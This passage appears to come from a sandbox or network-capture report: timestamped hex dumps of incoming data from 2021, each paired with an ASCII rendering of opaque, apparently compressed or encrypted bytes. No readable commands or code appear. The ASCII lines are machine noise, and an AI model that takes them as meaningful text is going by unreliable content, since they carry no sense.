                                                                                                                                                                                2021-11-11 11:26:10 UTC4093INData Raw: f6 ef 7a 5f 38 bb e2 78 95 47 c5 0c 01 e9 5c fc 97 7e d2 e5 ea 98 2f db be 2d 2c dc 3b 93 01 9c ab 10 44 8a b2 f0 ff 7b a5 a5 dd cc 02 d1 0c 56 d0 a2 62 30 89 fe fd 6c 32 34 29 e6 80 fb a2 b6 93 24 b4 8b 19 5f ab 35 67 bf 97 57 09 04 5d 8e 64 ac b4 a5 a6 77 13 cb 08 a2 16 93 fc ce a4 bd 1a d7 ae 29 6d 6e cd 69 75 86 6b e8 54 a1 e5 20 28 95 d3 4b 89 ed d5 9c bf b5 c2 40 7d db 4b 24 3a 2d 6c 62 50 5a af 11 9d ab e0 55 e5 d1 14 c4 62 25 5a 75 bb 61 5a 98 cf d4 17 cb 80 f3 ca c5 ce 08 e3 6c 19 b2 c0 a2 f5 55 c1 ba b6 8d 4f af 0b 76 eb dd 4e 7c d6 8c a7 e2 21 c5 9c c7 6d 7f 96 66 2d 20 10 cc 4e 2f 4c 09 05 92 cc 5a 21 8c 77 fb 4d 25 f5 45 1f a6 c7 e4 ed e9 c0 97 f1 3a 2b fd e2 96 64 c5 eb a2 6f d2 b7 65 4b 8d e0 61 da 38 24 d7 af 50 6c 18 8b c6 b2 7b 77 6c 77
                                                                                                                                                                                Data Ascii: z_8xG\~/-,;D{Vb0l24)$_5gW]dw)mniukT (K@}K$:-lbPZUb%ZuaZlUOvN|!mf- N/LZ!wM%E:+doeKa8$Pl{wlw
                                                                                                                                                                                2021-11-11 11:26:10 UTC4109INData Raw: 3e ad 38 1c 29 dd be be cb de 55 22 ea 98 16 4b f9 a8 cf b6 0c 85 e6 9d 4c 12 e9 8a d8 4f 85 62 ad 2e c9 02 d9 32 69 5f 7b d1 96 eb aa 35 7a ae 34 4b ec cb de a6 3c eb 09 e4 d5 21 4a 38 e9 24 c2 fb ad 2f 73 74 27 c6 c2 52 01 8b 52 0f 69 4a d5 14 3a 25 ea f0 67 0a 2d b9 3a e2 2a b6 09 5c 52 84 b3 c8 bb 29 e5 6a f8 39 cb df d7 4e 24 4f ed eb 75 c5 b6 92 4b a6 6d 25 e7 73 1d ac 4d 25 f7 19 08 45 c1 5d 34 01 c7 95 57 b2 3b 91 09 c2 3f b5 4b 61 8f 29 b0 dd 3d 4a a9 c2 93 ee 98 9b 09 9f e1 fa e2 2b a2 a0 97 cc 23 31 67 fa fe cc db d7 ec b8 8a 7c 4a a1 7f ee 7a 4e 25 fc 44 c8 09 17 f2 bb 65 fc fe c9 01 3a a2 80 c4 c4 d1 eb 64 17 aa c8 81 c2 bd 6e 1f bf f3 3e 0b 25 08 71 46 6b 0f 98 b2 00 d8 e9 c1 3d 1f 19 9d d4 17 cb d9 a4 16 20 b2 e6 d3 bd 0e d0 93 4f e9 36 d3
                                                                                                                                                                                Data Ascii: >8)U"KLOb.2i_{5z4K<!J8$/st'RRiJ:%g-:*\R)j9N$OuKm%sM%E]4W;?Ka)=J+#1g|JzN%De:dn>%qFk= O6
                                                                                                                                                                                2021-11-11 11:26:10 UTC4125INData Raw: 6d 92 22 6d 53 25 0d 4a ef da cd 41 91 2f fa 3d 3c 2a ac a5 89 35 75 47 53 0b 89 c9 e1 ab 19 7f e2 a0 89 c1 d7 45 45 a5 89 55 d3 44 97 35 62 2c ee 1a d5 c0 68 3b e9 58 36 45 c9 de d0 01 86 4a 9f d4 00 27 75 ec fc 4a c9 e9 72 9a 56 d5 38 78 f1 10 e1 11 2d 78 2e 29 20 1d ab 3a f1 bc 7f b9 6c 84 09 f6 ae f9 e1 d2 ef a6 af 27 13 d6 6b e9 29 a2 ff ec 9c 21 c0 01 25 6e 7e b5 dc 74 5a 92 33 7f 0b 00 59 21 c9 dd 67 e3 a5 d5 c3 25 d2 c4 ff 59 6a 69 71 6d 42 e4 20 29 89 cc 84 cf 89 e1 1e 7a f1 c8 3e ca 33 56 bc 4b a8 8c 4a be 64 67 ee 98 4b 05 fb 4d f0 21 9b 3d 13 ce c2 13 b2 80 d6 be 71 09 31 f9 3c 6e 5f a2 d4 96 53 ad e8 64 a4 af c4 91 ae 9c fe 29 5e df 44 7f 89 ed ab 99 e0 04 d0 e9 ec e5 ba 8a 68 5a 82 60 f0 67 80 2f fb bf b5 52 ff e3 f6 d6 a1 b8 2e 65 f3 95 dc
                                                                                                                                                                                Data Ascii: m"mS%JA/=<*5uGSEEUD5b,h;X6EJ'uJrV8x-x.) :l'k)!%n~tZ3Y!g%YjiqmB )z>3VKJdgKM!=q1<n_Sd)^DhZ`g/R.e
                                                                                                                                                                                2021-11-11 11:26:10 UTC4141INData Raw: 03 01 05 b5 0d da 62 95 75 96 fe 20 09 04 bd 1c fa 95 89 c6 57 73 c1 6b 55 9a 91 f7 c7 b4 3e ca ed a8 3e e6 f0 1d e3 e1 f7 c2 72 2c f4 b1 d5 60 da 01 ca 78 c5 f8 fc 18 fd 43 03 18 89 f1 0e 19 28 9b 0f 03 2b d4 18 80 3d fa ac 0b 9d 68 01 69 f0 bf 1c e9 ad 15 30 20 a4 4c 07 39 e1 c9 f0 29 fa e8 98 00 79 02 38 be 9c 2c 02 cc 6b 80 ad 7b f7 e1 99 61 f2 80 14 40 0e 1a 0b 9d 60 7f 4d fa 0f ff c4 10 52 93 cc 01 50 10 18 34 ea 18 19 30 8c d4 1a 34 f8 e7 14 ea 6c e7 5c 42 2c 00 14 a1 66 de 45 ae f2 99 8d 38 05 e1 0a ec 78 12 08 00 3b ea fe ab 6d 67 4c ef be 5f ee 07 43 27 8b c9 d6 ab 41 21 52 79 c0 78 ee 04 c0 14 46 44 15 be a4 fb 9e 14 75 19 95 18 01 2c 2f af f4 c4 b7 82 68 e3 28 cf 08 60 c3 cc 95 17 3e 10 c8 b8 87 09 df 8e 0a d4 e1 45 a3 1c ae 03 9d cf 50 29 05
                                                                                                                                                                                Data Ascii: bu WskU>>r,`xC(+=hi0 L9)y8,k{a@`MRP404l\B,fE8x;mgL_C'A!RyxFDu,/h(`>EP)
                                                                                                                                                                                2021-11-11 11:26:10 UTC4157INData Raw: 85 c5 20 41 3b f7 4d 63 19 7e 99 0f 7a 85 25 ee 29 50 7f e8 fd a0 19 ff e3 94 91 52 5f d9 53 52 e1 91 39 3a a8 5c e2 3e 5f f1 1e 49 55 67 61 12 3f ab 8a 7b 55 e1 2d 72 92 e0 ac 3a af 54 2f 57 99 61 11 4b 54 12 2b 16 a8 64 ca b9 4a 17 03 ab ce 7e 12 09 17 ab 8e b8 02 2e 42 4c 64 32 55 9e e7 08 19 80 fb 27 50 c2 23 12 bd f4 03 ab cf 33 27 55 5c de 65 e8 a7 05 4f ac f8 5b 8a ad 09 c2 8c f1 fd c6 7b 10 e8 79 d0 92 ff c4 6a a5 da 6e 08 a9 02 25 df 3a 3a 55 34 11 4b 02 e3 3b ca 25 21 56 4b 03 e6 00 5f 92 ce 5c 60 ac 23 e9 a3 32 6b 14 4f 28 93 2a 52 5f d9 0d a7 65 77 97 36 24 a8 ab 29 dc 40 f4 e5 22 7d 4a 0d b2 c0 c4 29 31 ab f8 44 f2 f4 02 1c 24 55 7b 21 47 09 0e 11 2d 20 d6 39 73 a2 22 42 d5 34 24 e1 14 12 9b ef 0b 27 ef 4c 05 17 4c 03 0f be 8a 9e 42 29 ca 04
                                                                                                                                                                                Data Ascii: A;Mc~z%)PR_SR9:\>_IUga?{U-r:T/WaKT+dJ~.BLd2U'P#3'U\eO[{yjn%::U4K;%!VK_\`#2kO(*R_ew6$)@"}J)1D$U{!G- 9s"B4$'LLB)
                                                                                                                                                                                2021-11-11 11:26:10 UTC4173INData Raw: 99 fa 49 25 e8 c9 fc 78 e2 4d 55 7e cb 53 a3 36 da e3 57 6f ab 93 06 cc 8f 3a 95 ff 96 f6 41 33 3e ba 2c a6 03 4a 3a ec 93 b4 aa e3 d8 80 36 d6 13 62 7a 95 f1 79 6b 89 a7 55 e5 64 04 45 09 7d ae df d6 4a f8 19 ad bd ed ce af 39 32 fe 96 0d 41 09 2e 64 38 b8 2e 5e c6 91 6c ed 48 6b fd b1 12 be d2 c6 a4 fb a3 b3 27 32 dd 94 9b 9f 74 af 52 5d 45 bf 89 09 31 5f 9e 62 05 20 60 bd e5 61 22 49 e4 8b 74 77 49 90 22 2b f1 62 1d 3e 2b e6 62 12 34 24 bf f2 d6 92 aa f3 6a d2 bf e2 e3 16 eb 8a ac 76 75 f0 44 05 89 0b 41 b4 92 ab b3 da 09 81 c7 e4 b2 93 10 b0 44 30 50 27 a6 11 25 41 52 d4 87 5e 12 4c 63 26 bf 39 88 d1 27 34 e8 3c 1c cc 05 68 22 0a 30 19 ad 72 08 02 d6 90 d9 23 59 1f ef 69 50 5f b6 b3 4b 41 aa d4 fc bb a8 0d e4 b8 ee e2 0f 91 22 3a 01 ef ff 20 fe 37 25
                                                                                                                                                                                Data Ascii: I%xMU~S6Wo:A3>,J:6bzykUdE}J92A.d8.^lHk'2tR]E1_b `a"ItwI"+b>+b4$jvuDAD0P'%AR^Lc&9'4<h"0r#YiP_KA": 7%
                                                                                                                                                                                2021-11-11 11:26:10 UTC4189INData Raw: f3 53 50 35 14 a0 ce f2 9d d7 96 ae 5a 2b 94 5c ea 39 d3 9f d4 ad cd 64 28 77 2e e9 63 da 4e d7 f1 b8 49 54 f9 e9 57 53 5b 16 cb a2 59 4f bb 25 24 0b 94 d1 08 58 b5 25 5e 4d 09 09 cb 57 14 60 9a 51 8e 89 4f c2 bc 11 e5 b8 00 a4 31 63 e2 90 2b 3d 57 2b d9 dc 61 ac fa 45 17 25 42 5d 55 89 5e 5d 4e 11 94 64 69 7c 23 21 4b 21 6a 2f e6 18 5e 63 ef 21 f8 eb 40 7f 39 1b d0 0f ff 4a e7 ff ca 94 5b e9 3a a5 fe d8 5f 21 81 ec fa 7d c7 fe ad d7 34 03 4e 66 af cc 29 34 5f 24 ad 2b 3b 04 41 2f e2 ed 9d e7 de aa 7b f2 e9 75 47 02 16 49 be 99 90 2a 13 20 b0 b1 c8 97 d1 55 e9 dd f1 61 48 83 27 7f c5 0f b2 d0 07 fe d6 e2 29 d6 a9 c8 e2 e6 dd d0 2e bc c5 e4 ea be e3 06 80 89 ff 41 2b 07 9f ee 84 bd 44 84 91 96 6b 5d 1a 79 53 43 92 c4 ff cd 79 2b bc dd d6 af 97 08 b4 f1 e7
                                                                                                                                                                                Data Ascii: SP5Z+\9d(w.cNITWS[YO%$X%^MW`QO1c+=W+aE%B]U^]Ndi|#!K!j/^c!@9J[:_!}4Nf)4_$+;A/{uGI* UaH').A+Dk]ySCy+
                                                                                                                                                                                2021-11-11 11:26:10 UTC4205INData Raw: fd 71 40 17 c9 eb 8c 39 41 64 cd 26 eb c8 d4 e4 9e aa c8 a7 4c 66 d8 16 b3 7d 51 eb 75 88 ae e7 7b 59 da 88 d8 27 fe 11 c9 b0 29 89 d1 97 c5 61 12 e3 e8 80 c2 cf 88 cb dc 3b c9 4c 80 9f fe 51 c8 41 02 66 d3 28 e9 5d 89 21 fd ce ac b5 70 80 95 f7 9a 85 76 04 93 e0 be a3 cf cb c8 6e 16 e6 f7 ed 79 4b c7 fb 4c 75 cf ae 74 65 aa 8a 1f 5e 64 67 82 d4 df 5f f9 bf 27 7c 65 da 59 87 49 fc 79 62 2d 40 71 68 49 5c 62 eb f4 2a eb 53 9d 27 56 07 c5 f5 62 c3 c5 fc 61 c9 59 06 17 ce ff ce c0 4a cd 78 02 91 e9 57 89 8c 5d b3 26 84 ac bb e6 4c b5 94 4c 4f c4 f6 22 40 24 cb 5f 08 ca 88 21 04 96 c1 0b f7 d0 6e 90 f4 c9 17 44 33 23 d9 88 30 a0 ec 0b dd d2 d8 3e ff 9c 56 b0 ba 98 c7 4a d1 bb 34 78 82 97 23 75 14 6d 52 e4 d9 4e f1 81 3b dd d9 2b a3 c7 13 c1 e4 4f e9 c3 b2 bf
                                                                                                                                                                                Data Ascii: q@9Ad&Lf}Qu{Y')a;LQAf(]!pvnyKLute^dg_'|eYIyb-@qhI\b*S'VbaYJxW]&LLO"@$_!nD3#0>VJ4x#umRN;+O
                                                                                                                                                                                2021-11-11 11:26:10 UTC4221INData Raw: 29 cc e1 66 6a 39 e2 6e 2d 32 fa 7b 8c ad c4 ca 27 31 16 f3 2f 3b de b6 4b 37 89 9a 35 e9 eb 64 6f a2 d6 8b d7 de fe 50 c9 49 a4 4d ec 29 28 33 09 98 92 52 95 d1 a2 44 dc ef a3 cb 16 29 13 57 7d e6 9f 5b fd 81 d2 ba 35 45 e9 71 85 89 c1 dc 47 29 b0 57 2d 21 dc 59 b3 44 f4 fe 64 85 e5 bb 3b 3d 30 7f cd a6 2a 0a 9b 05 b7 c4 ea a6 bb 4b fb dd a1 7f c1 b6 01 d9 6b 62 f0 4c d7 8b 49 55 46 78 ee e1 bd 5c 1f 5b 2e b0 d4 18 a5 e2 80 7d 56 5a c5 e6 f4 c1 31 5f c1 e2 22 89 e9 f7 e5 e4 a7 f4 67 0a 03 3a 80 5b e2 08 d5 9e ae 9d a9 b7 77 1e 64 9d ba ad 7b 41 a2 f6 97 79 72 42 03 3b 57 32 41 5d 66 4d ce de f2 7a ea d5 ec 03 9f 09 55 f4 7f 79 c7 3f 32 cc c1 66 1a 6b 21 fa d5 66 f7 3d 09 cc 5e e6 6d 3b 89 cf ca 2c 55 8a 3b 29 85 57 91 9b 82 1e b6 bc 43 74 ca fe de 86 cb
                                                                                                                                                                                Data Ascii: )fj9n-2{'1/;K75doPIM)(3RD)W}[5EqG)W-!YDd;=0*KkbLIUFx\[.}VZ1_"g:[wd{AyrB;W2A]fMzUy?2fk!f=^m;,U;)WCt
                                                                                                                                                                                2021-11-11 11:26:10 UTC4237INData Raw: 2d 7c 4e e9 2b 0f d7 96 1a bf 05 1e ed a8 ff a3 e2 b5 62 e8 1b e5 b7 27 d9 0c a0 c4 9f 57 ba cf 5d 04 9c 53 a9 6b 92 bb 84 92 16 93 d8 69 45 dc 14 cb 89 5d df 94 20 8a a8 f9 dc 61 4c 29 d7 3f a8 87 c3 41 c7 45 85 50 3b 94 4b 74 df aa a9 e7 5f a8 b6 f4 ff a3 05 51 4d 6b c5 f7 fe b6 0f 4b 25 26 be de a3 44 a7 1a aa 8f c5 40 a2 07 c9 6e 23 fe 94 c9 df 11 fe e4 2f 38 fc 41 27 5b 49 b9 80 1a 09 f5 2b 41 27 e9 2d 28 bd e5 84 15 be f9 d4 d7 94 31 93 21 03 4e 49 ec 34 b5 d5 02 fa ca 18 5f eb 30 9d 89 e1 49 bf ba 27 57 cc 61 52 f1 34 77 44 08 4c 2d 21 f9 df 3b 1c 25 9f f7 fd 47 56 27 24 30 f6 a6 f0 92 74 eb d9 f8 6e 9d 7a 2a e6 23 39 36 f3 b7 65 d6 24 4d eb 46 e6 fc 21 ef 42 ec f7 fe d4 c8 a8 e4 3f 25 ae e0 cf f7 95 53 89 8b 09 f6 8b 31 54 d3 13 df af 75 7c e0 59
                                                                                                                                                                                Data Ascii: -|N+b'W]SkiE] aL)?AEP;Kt_QMkK%&D@n#/8A'[I+A'-(1!NI4_0I'WaR4wDL-!;%GV'$0tnz*#96e$MF!B?%S1Tu|Y
                                                                                                                                                                                2021-11-11 11:26:10 UTC4253INData Raw: e8 dc 32 7b f9 e8 48 6f e9 fb 88 ee 49 d7 f2 a4 f5 2f ab 3c 16 c9 99 a7 89 8b 13 46 6c 4a e5 39 ca 2a ab 31 6b 89 13 38 7a a4 af b7 50 4f bb 34 fc ee 99 7f 26 68 4a 2d 8f 7a 4b a4 35 ff e5 ee a5 09 c4 7e 53 42 29 c0 5f cd a6 ad 45 c4 27 4c 8b 9f f9 92 04 45 33 17 aa b2 62 89 10 ec b9 b0 d7 bd 42 bf 55 4e 26 95 32 df 7f 59 c6 81 21 d2 45 03 16 2b e9 fe 26 e8 36 12 ef 28 3d e2 4a 3f 3d 29 4c bf 44 5b 29 ab 25 67 be 53 58 fa ca 36 43 07 5b aa 60 1f 8e 6a ac 5f 73 76 46 8a ae 6e bd 4e ba 9b 40 93 09 92 8b 42 55 d4 37 52 7f 71 42 a5 04 9a 55 be e3 20 92 12 db c4 da ab dd d2 e9 12 6d 1a 92 75 37 1f f9 af 5d b4 c2 56 ea 2a 77 04 32 90 04 7d 35 ef f3 7a 0f 21 c3 9c 5f 2a 10 93 ea 2f fd 97 45 af c1 b7 45 2d 6b 77 5a 5b e1 65 3f 2d 8d 6b e9 46 d6 ae 21 cd 21 c6 2f
                                                                                                                                                                                Data Ascii: 2{HoI/<FlJ9*1k8zPO4&hJ-zK5~SB)_E'LE3bBUN&2Y!E+&6(=J?=)LD[)%gSX6C[`j_svFnN@BU7RqBU mu7]V*w2}5z!_*/EE-kwZ[e?-kF!!/
                                                                                                                                                                                2021-11-11 11:26:10 UTC4264INData Raw: 88 8e cb 4e c4 b2 ba b7 c7 4b ad 11 89 cb 46 08 53 c3 4e 24 66 ed 0b 84 a8 29 8f 7d 4e ff 42 c4 4e f9 15 5c 9f 17 21 c1 a6 15 09 41 30 17 ce 41 ab 64 d7 bb 7f 67 d6 2f 54 b3 e2 ce 08 e7 ba ad a2 e5 ef 10 67 35 90 21 5b ba 34 83 f2 98 4a f6 a6 8b f6 55 c7 c1 0b 09 d6 f6 16 cb ff 2d 67 06 27 2d 4a bc 2e 87 ca 4d 64 1b 1d a4 eb 69 75 a5 54 d7 ef e7 d2 2b f2 e3 2f 31 d0 e7 7a e8 f8 e5 fa dd 34 c6 fd e7 f3 2f 7c 76 64 ee e8 5c a3 c6 bf 88 45 d6 ab 9d 34 3c 40 a2 04 57 b2 52 59 bd a7 8a 0d 75 3e 82 3c 98 a6 0d 49 ff ce 5c 4a ef ab de 5f 25 e2 7b 6f 10 90 93 ac 1a d6 ed 71 81 45 31 1c 24 27 15 5f af 74 85 53 b1 bf b7 79 4f f8 f6 5f fe 64 ba d4 d6 bc 55 b5 bb a1 de 3a 3d d1 26 76 4b f8 41 5b a8 95 a3 ea bd 24 4d fb 32 4a d9 77 b2 ea df 3a 9a 89 b1 56 38 cd 36 3b
                                                                                                                                                                                Data Ascii: NKFSN$f)}NBN\!A0Adg/Tg5![4JU-g'-J.MdiuT+/1z4/|vd\E4<@WRYu><I\J_%{oqE1$'_tSyO_dU:=&vKA[$M2Jw:V86;
                                                                                                                                                                                2021-11-11 11:26:10 UTC4280INData Raw: 13 18 fb 3c 5e 0a 09 33 6d 45 51 5c 15 79 0f 02 f9 24 06 54 2a 05 92 78 8f 05 ff cf 79 16 29 32 fe 2f 02 4f c2 53 27 df 67 eb 08 03 22 73 e9 2b 27 2b 8b 8e 7d 2f 29 26 fc 0e 73 e0 e9 6b f9 4b 0e ab 8e eb 25 20 d7 45 f0 28 9e 5e 65 24 88 b1 70 7e ec 95 a4 1e ad c2 12 4b a1 04 7f 6d aa 88 3d a8 c9 75 7a 83 5f e1 ba 3d 84 6f a6 8d d7 eb dc 84 34 4b 24 f9 0f 5f bf 3d 58 2e 9f 23 79 97 4e c8 95 5d 16 d4 bd e8 c6 3e 06 2f f3 67 7c 9e 78 11 49 9d 7f 9c d4 40 d6 3e 95 65 27 ea d0 12 37 b8 51 b4 10 83 80 5f bf 1c 64 07 82 b1 a9 9a bb 00 d9 18 4d 10 c0 61 c2 1c 71 1c 02 f7 91 b1 a3 b8 5c 06 26 6a 5a 28 34 02 b2 b7 b1 3c 40 38 40 bb e9 2b 2d fc ff 2d 5f 24 3d 27 04 d5 08 49 06 00 ca 29 d7 ff 59 3e 0b 73 60 14 5c 23 27 bf 7f cc bd 7e db 00 76 97 d0 56 a0 38 18 8c d3
                                                                                                                                                                                Data Ascii: <^3mEQ\y$T*xy)2/OS'g"s+'+}/)&skK% E(^e$p~Km=uz_=o4K$_=X.#yN]>/g|xI@>e'7Q_dMaq\&jZ(4<@8@+--_$='I)Y>s`\#'~vV8
                                                                                                                                                                                2021-11-11 11:26:10 UTC4296INData Raw: 9d be a7 30 5f ff 2e e9 3d 66 24 16 ca a5 49 fa 32 08 02 92 49 bd 32 a6 7d 7b c6 af ca ae df 14 1a bf 6c 81 2d 29 f3 db 71 97 31 eb 16 10 f0 dc c2 f5 2f 8b 0f 5e a9 89 19 21 db 65 11 76 24 2d 90 9a 7c 46 04 81 a8 33 2b b1 44 2c 57 8b f4 66 a5 2f ec f0 16 3c b0 43 64 37 3c e6 ab e7 67 4f ed 5d 96 ed 14 84 e8 10 fd 67 96 28 55 f4 ac a7 96 3e 27 f9 c2 69 f2 67 b7 6e 4e 95 fb d7 a5 de f6 21 15 b5 9e fa 29 09 2a ff 09 8f ea f7 4c 0a bf 6e 70 b7 e6 23 2d 01 d0 f0 21 9d fc 61 eb 74 72 c9 7d 46 12 2e ef 3f bf 65 32 bf 17 26 bb 75 c7 ba e2 97 2f 48 31 5d 31 2b 31 13 e3 04 0e 64 d8 f0 a2 82 8a c6 62 3b 02 22 1d 62 13 67 d7 d0 67 e6 e9 b7 74 3c e9 fd ec dc 45 05 a5 8c f4 a2 11 39 27 b0 ee 46 97 55 9c bc bc a2 c6 41 9a 0b 98 f1 6b 48 db bf 2f 70 d6 97 74 16 ef 4b 20
                                                                                                                                                                                Data Ascii: 0_.=f$I2I2}{l-)q1/^!ev$-|F3+D,Wf/<Cd7<gO]g(U>'ignN!)*Lnp#-!atr}F.?e2&u/H1]1+1db;"bggt<E9'FUAkH/ptK
                                                                                                                                                                                2021-11-11 11:26:10 UTC4312INData Raw: d8 ef 41 5a 51 ca 3e 16 e5 78 b3 a3 93 a7 f8 13 e5 20 ce d9 5b ef 09 bb c6 de 7e 52 56 9c ad f9 27 42 35 40 96 e0 9d 51 a5 4b 56 fe 25 fb bb af d6 82 64 f0 ab e8 36 a4 61 94 c6 0a 7e 39 44 7a a6 20 24 8b 89 52 74 56 2f dd 1c 06 95 57 1a c3 09 d9 7d 94 03 5e cd fc b3 e4 ab e3 bc 4d 13 d3 27 06 45 08 20 5c 96 62 f1 4b 32 fa ce 25 27 0f 54 67 c4 b2 ab 04 63 ea 88 ef 2d 7b 08 d4 31 4a f2 b2 b1 84 ce 78 45 30 16 aa ca 5f 27 c6 d5 16 62 b7 5b c5 b5 ac be f7 5a 78 e1 3e 64 cb ae e6 61 65 36 35 63 ff 3f cc d9 a4 e8 29 f0 81 c1 2a ea 38 6a 09 ef 2a e3 e6 9f 57 d5 fb ca 69 4f a8 0a cf ce 52 ee 71 48 c7 06 2b cb 0b 4a ee 99 66 2e fd 16 2f fa 51 54 92 01 fc 4b e5 a6 95 4a bd 97 84 89 c8 ee ca e6 25 cd 6d 6f 16 c9 62 0b cd f9 6f 2c af 0b fd 10 55 c1 9d e9 7b a9 ed d2
                                                                                                                                                                                Data Ascii: AZQ>x [~RV'B5@QKV%d6a~9Dz $RtV/W}^M'E \bK2%'Tgc-{1JxE0_'b[Zx>dae65c?)*8j*WiORqH+Jf./QTKJ%mobo,U{
                                                                                                                                                                                2021-11-11 11:26:10 UTC4328INData Raw: f3 41 a6 bf 25 d4 88 cb 5d 3a ff 57 74 b7 69 d5 d9 2b 09 33 7d d5 6c b3 c9 d0 c2 7d ec c0 9f c0 3b 29 ff 97 55 14 12 b5 45 38 12 e4 fa 9c 1c e7 4a f0 e2 36 df af 75 b9 2d 78 23 fc 27 e3 d7 9a bc 41 37 3e f4 09 e0 bd 7c 7c 9d c7 a5 7f ec e4 ef 2e a6 91 49 3c 88 c1 4c b0 c4 97 45 bf 16 f0 bb 8f d3 77 91 cd 9f 25 6f 94 eb 80 f3 e7 49 b7 dc fc c8 9e 27 e8 62 c6 42 b5 51 19 66 66 e5 aa 9b 55 7c 00 5b 4e f8 a9 10 8b c1 5f b2 72 72 5f 1d f4 93 d9 b1 22 1d 8f 3b fd a9 27 e9 7c 21 73 9a 09 d6 b9 64 c0 f6 8c 34 30 9b ea fc 9f 25 9c 5b 35 89 2b 30 7c 3b d1 01 15 a1 e7 7b ed 87 25 e9 7e 34 54 b5 4c 6b c1 6a 21 4c 39 20 30 db 1b 9f c2 51 f4 ef 52 77 5c 99 7e bd 5a 99 4a 23 37 8c ab d7 14 52 9d cc 38 2f e6 04 9e 69 bf fc 74 42 b4 7d 5d 5a 97 4a c0 ee cb bc 45 f5 3a 65
                                                                                                                                                                                Data Ascii: A%]:Wti+3}l};)UE8J6u-x#'A7>||.I<LEw%oI'bBQffU|[N_rr_";'|!sd40%[5+0|;{%~4TLkj!L9 0QRw\~ZJ#7R8/itB}]ZJE:e
                                                                                                                                                                                2021-11-11 11:26:10 UTC4344INData Raw: e2 cc 77 7c a6 5a d4 5e 63 09 c2 9d bd 7c 92 e8 cb 05 db cc 5b 45 fa 64 43 ef fd 20 8b ef dd 14 2d 94 77 24 ae 59 4d 6b a2 8a d6 aa 75 b5 ab 64 a4 bb 62 6d ce 66 40 4a 31 ac 16 2f ef fd 94 6e b2 1b 94 2b 5a fe ae ed 5f 3e ca d1 11 c2 ca 4c 7a 05 cf 45 21 0a b2 d5 cb 41 d7 8d 99 64 6a b2 c8 d7 99 82 2b 8d 14 20 2b 12 a0 b9 ea 96 17 93 71 17 ab 75 ad e9 12 42 3d dd c1 33 d5 fc c4 5f 7a e2 64 4e aa 41 a1 4c 21 17 9c 67 8f 5a bd cd d3 af b2 31 96 e3 05 d2 53 e3 e9 f8 d4 f5 4e fd 54 a4 af ac ab 80 29 f8 41 8a 39 bf f0 87 9d f6 4f c9 5f 88 32 4a 59 ef 52 5b 05 55 47 8c 25 da 90 8c 57 8c ef b7 f8 ba 97 45 40 10 88 c4 c1 11 57 ba 95 57 af 10 95 af 5e f9 2e 80 41 59 4c 89 0f 2d e9 34 11 eb ff 3a e8 46 d7 eb 9c 24 c1 84 9f e2 3c fd 4c de d6 58 9d 1c 73 90 4e fb 0b
                                                                                                                                                                                Data Ascii: w|Z^c|[EdC -w$YMkudbmf@J1/n+Z_>LzE!Adj+ +quB=3_zdNAL!gZ1SNT)A9O_2JYR[UG%WE@WW^.AYL-4:F$<LXsN
                                                                                                                                                                                2021-11-11 11:26:10 UTC4360INData Raw: 98 b1 b5 ba d8 d5 ab 0e 57 67 10 a7 d5 4c 63 97 ca 0f dd e5 2e 2f db b9 27 54 9b 25 73 bf 2f 5c 24 25 db 4d bd 26 ca 14 ed d8 42 b9 8b 76 ab 1d ee ae 67 e2 09 c1 df 14 df 26 eb 88 ae d2 57 d1 a3 ad fe c4 65 35 d8 63 f5 5f 3f 29 0d 23 8c 25 cd f7 16 89 bd 45 66 2a 9b b7 ba c7 d6 14 c9 ff 6e a4 58 f5 02 d2 16 5c ff 17 ff a9 75 85 31 c0 e6 05 4c 40 9c d2 f9 76 aa 14 4a ff ef 28 33 20 a7 96 30 76 16 ff e7 95 16 31 95 42 3d c5 a5 2f 50 86 b9 d5 6b df 65 d6 27 f5 96 be b7 ba 0f c2 3e 71 34 af 7c 91 17 f6 bd 6c 82 4c 21 cf fc 7d 89 29 d2 d5 14 16 b7 e2 f7 de 42 52 d6 cb 51 e9 2f 30 8c ee 45 33 26 2c 24 c0 e9 28 6e f1 52 d1 ab a5 5d b2 9d 55 f0 15 5b eb e8 9f a2 c3 dd 9c b9 7c 45 5e 2b ae 74 3d fa b9 ad d7 9d 9b 7f f3 ee 38 24 85 eb d3 71 60 fb 12 1d 75 f0 af 13
                                                                                                                                                                                Data Ascii: WgLc./'T%s/\$%M&Bvg&We5c_?)#%Ef*nX\u1L@vJ(3 0v1B=/Pke'>q4|lL!})BRQ/0E3&,$(nR]U[|E^+t=8$q`u
                                                                                                                                                                                2021-11-11 11:26:10 UTC4376INData Raw: f6 7f 93 4c 3e 51 7c a3 07 e5 51 11 1b 41 25 fe 88 2f b0 49 55 b7 9b ac c4 a7 71 1e 89 52 54 76 22 72 67 ad af 77 1c 42 e1 4e 01 ba ef 92 b8 00 c1 07 03 5f 38 d5 32 d8 7f 72 f4 15 10 8d db 5d e4 fa 8b 60 d3 fb 39 18 6a 17 e5 f6 55 9a 16 7f e5 a9 c9 55 c5 0c 20 0b 06 68 52 e0 7b 7c ae e3 80 68 34 24 1d f7 9f 76 b5 8f 40 4a f5 09 2d 56 db 2d 4c 3b 70 68 1d 2d 75 1b 47 50 a6 7f 59 5c f6 f0 b5 54 29 ee 5d 6c be 3d 8b 12 bc 36 a8 eb c9 f9 57 1c 7a 0e 8b e8 fd 7b a1 28 b2 df 5f 7b 32 fb 3c d5 c7 a1 82 3f 85 ef 5b 55 c9 aa f1 7e cd 06 a5 62 56 d3 7e 06 68 f8 c0 fd 3f ee 9f 89 e6 77 d0 cb 9f d3 c1 90 83 03 68 66 e0 7d 7f a8 78 b1 ff 7a 3f 3c 3c 3e fb b5 79 1b 6f fe cf 6b fb f5 65 04 97 ed ff 77 ae 2d f7 fc 81 74 25 e9 47 57 94 43 47 14 50 6f 17 27 4e 3a f6 a8 f2
                                                                                                                                                                                Data Ascii: L>Q|QA%/IUqRTv"rgwBN_82r]`9jUU hR{|h4$v@J-V-L;ph-uGPY\T)]l=6Wz{(_{2<?[U~bV~h?whf}xz?<<>yokew-t%GWCGPo'N:
